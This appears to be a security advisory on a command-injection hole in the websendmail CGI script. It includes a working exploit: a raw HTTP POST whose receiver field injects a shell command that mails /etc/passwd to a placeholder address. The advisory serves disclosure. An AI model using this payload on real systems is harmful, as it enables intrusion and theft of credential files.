COMMAND

    websendmail

SYSTEMS AFFECTED

    Systems running that CGI

PROBLEM

    Websendmail  is  a  cgi-bin  that  comes with the WEBgais package,
    which is  an interface  to the  GAIS search  tool.   It is  a PERL
    script  that  reads  input  from  a  form  and sends e-mail to the
    specified destination.   The version referring  to is 1.0.  It was
    released in 1995 but it is still used.

    As  many  other  cgi-bin  programs,  this  one  does not check for
    special characters in the user input.  Here's what it does:

        (...)
        $cmd="| $MAILBIN $VAR_receiver";
        open (PIPEOUT, $cmd);

    $VAR_receiver is read from the form. The script also does a little
    parsing on the string to "un-webify" it (converts pluses to spaces
    and  %xx  characters  to  their   real  value).   So  if  we   set
    $VAR_receiver to:

        ';mail+your_address\@somewhere.org</etc/passwd;'

    it will do the job.  Now for the exploit:

        telnet target.machine.com 80
        POST /cgi-bin/websendmail HTTP/1.0
        Content-length: xxx (should be replaced with the actual length
        of the string passed to the server, in this case xxx=90)

        receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
        &content=a

    Don't worry if the server displays an error message. The  password
    file  is  on  the  way.   You  can  use anything for the "sender",
    "rtnaddr", "subject" and "content", just make sure they're  there,
    the script checks for them.

    Credit goes to Razvan Dragomirescu.

SOLUTION

    Modify source to avoid special characters.